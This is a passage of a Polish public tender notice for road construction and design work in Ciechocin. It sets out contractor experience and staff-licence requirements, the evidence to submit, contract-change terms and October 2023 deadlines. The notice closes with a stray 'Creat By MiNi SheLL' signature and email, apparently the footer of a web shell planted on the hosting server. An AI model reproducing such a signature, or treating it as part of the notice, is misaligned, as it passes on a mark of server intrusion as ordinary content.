należy przygotować wg wzoru stanowiącego Załącznik Nr 5 do SWZ.<br/><br/>Uwaga:<br/>Zamawiający uzna za spełnione warunki również w przypadku, gdy doświadczenie posiadane przez Wykonawcę obejmuje szerszy zakres i wartość od wymaganych w powyżej. Zamawiający nie dopuszcza sumowania wartości kilku zadań celem uzyskania wymaganego warunku kwotowego, o którym mowa w pkt 2 lit. a).<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia Zamawiający wymaga, aby jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazał się wykonaniem co najmniej jednego zamówienia/roboty budowlanej, o której mowa powyżej. Dla Zamawiającego bowiem, w celu wykazania zdolności do wykonania zamówienia jest niezbędne to, aby Wykonawca posiadał doświadczenie w wykonaniu minimum jednego przedsięwzięcia o wielkości i zakresie porównywalnym do robót stanowiących przedmiot zamówienia, gdyż takie doświadczenie pozwala na uznanie, że Wykonawca daje rękojmię jego należytego wykonania.<br/><br/>W celu wykazania spełniania warunku udziału w postępowaniu, każdy z Wykonawców składa w ofercie oświadczenie, o którym mowa w art. 125 ustawy Pzp.<br/>Natomiast na wezwanie Zamawiającego, o którym mowa w art. 274 ust. 1 ustawy Pzp Wykonawca będzie zobowiązany do przedłożenia wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty Wzór wykazu stanowi załącznik nr 5 do SWZ.<br/><br/>Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/>b) w zakresie dysponowania osobami zdolnymi do wykonania zamówienia:<br/><br/>Zamawiający wymaga aby Wykonawca wykazał się dysponowaniem na czas realizacji zamówienia:<br/>- Kierownikiem budowy, spełniającym następujące wymagania:<br/>posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności. Posiada doświadczenie polegające na realizowaniu, jako kierownik budowy lub kierownik robót drogowych minimum jedną robotę budowlaną polegającą na remoncie, budowie, rozbudowie lub przebudowie drogi o wartości robót budowlanych nie mniejszej niż 2 000 000,00 zł brutto.<br/>- Projektant branży drogowej /Koordynator zadania w zakresie projektowania:<br/>posiada niezbędne do wykonania zamówienia uprawnienia do projektowania zgodnie z ustawą Prawo budowlane w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawniana budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia.<br/><br/>W celu wykazania spełniania warunku udziału w postępowaniu, każdy z Wykonawców składa w ofercie oświadczenie, o którym mowa w art. 125 ustawy Pzp.<br/><br/>Natomiast na wezwanie Zamawiającego, o którym mowa w art. 274 ust. 1 ustawy Pzp Wykonawca będzie zobowiązany do przedłożenia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 6 do SWZ.<br/><br/>Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/>3) warunek dotyczący sytuacji ekonomicznej lub finansowej Zamawiający ustanawia następujące minimalne poziomy zdolności w odniesieniu do zamówienia:<br/><br/>Zamawiający nie ustala minimalnych poziomów zdolności w tym zakresie<br/><br/>4) Zdolność do występowanie w obrocie gospodarczym:<br/>Zamawiający nie ustala minimalnych poziomów zdolności w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga złożenia następujących podmiotowych środków dowodowych:<br/>1) środki dowodowe składane wraz z ofertą (w zakresie wskazanym przez Zamawiającego):<br/>a) oświadczenie o niepodleganiu wykluczeniu, zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ,<br/>b) oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie ze wzorem stanowią-cym załącznik nr 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o którym mowa w pkt 1, składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniami, o których mowa w pkt 1, także oświadczenie pod-miotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby - wzór oświadczenia stanowi zał. nr 3a do SWZ.<br/>2) środki dowodowe, składane na wezwanie Zamawiającego, o którym mowa w art. 274 ustawy Pzp:<br/>Stosownie do treści art. 274 ust. 1 ustawy Pzp, Zamawiający będzie żądał od Wykonawcy, którego oferta została najwyżej oceniona,<br/>złożenia następujących podmiotowych środków dowodowych:<br/>a) w celu wykazania minimalnych zdolności, określonych w Rozdziale XI ust. 1 pkt 2) lit. a SWZ, wezwany Wykonawca zobowiązany<br/>jest do złożenia wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów - inne odpowiednie dokumenty Wzór wykazu stanowi za-łącznik nr 5 do SWZ.<br/>b) w celu wykazania minimalnych zdolności, określonych w Rozdziale XI ust. 1 pkt 2) lit. b) SWZ, wezwany Wykonawca zobowiązany<br/>jest do złożenia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na te-mat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, warunek o którym mowa w ust.<br/>1 pkt 1, 2 i 3 dopuszczalne jest wspólne wykazywanie spełniania warunku udziału w postępowaniu. Nie ustanawia się<br/>szczegółowego sposobu spełniania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków<br/>udziału w postępowaniu.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymaga-ne.<br/>W przypadku Wykonawców wspólnie ubiegający się o udzielenie zamówienia, Wykonawcy dołączają odpowiednio do oferty<br/>oświadczenie, z którego wynika, które dostawy lub usługi wykonają poszcze-gólni Wykonawcy. Tekst oświadczenia znajduje<br/>się w treści załącznika nr 3 do SWZ.<br/>Dopuszczalne jest poleganie na zasobach innego podmiotu w celu wykazania spełniania warunków udziału w postępowaniu.<br/>Tym samym Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych<br/>sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty<br/>jako najkorzystniejszej) przedstawiają Zamawiającemu umowę, regulującą współpracę, tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści<br/>wybranej oferty w zakresie uregulowanym w art. 454 – 455 ustawy Pzp oraz wskazanym we<br/>Wzorze umowy stanowiącym Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com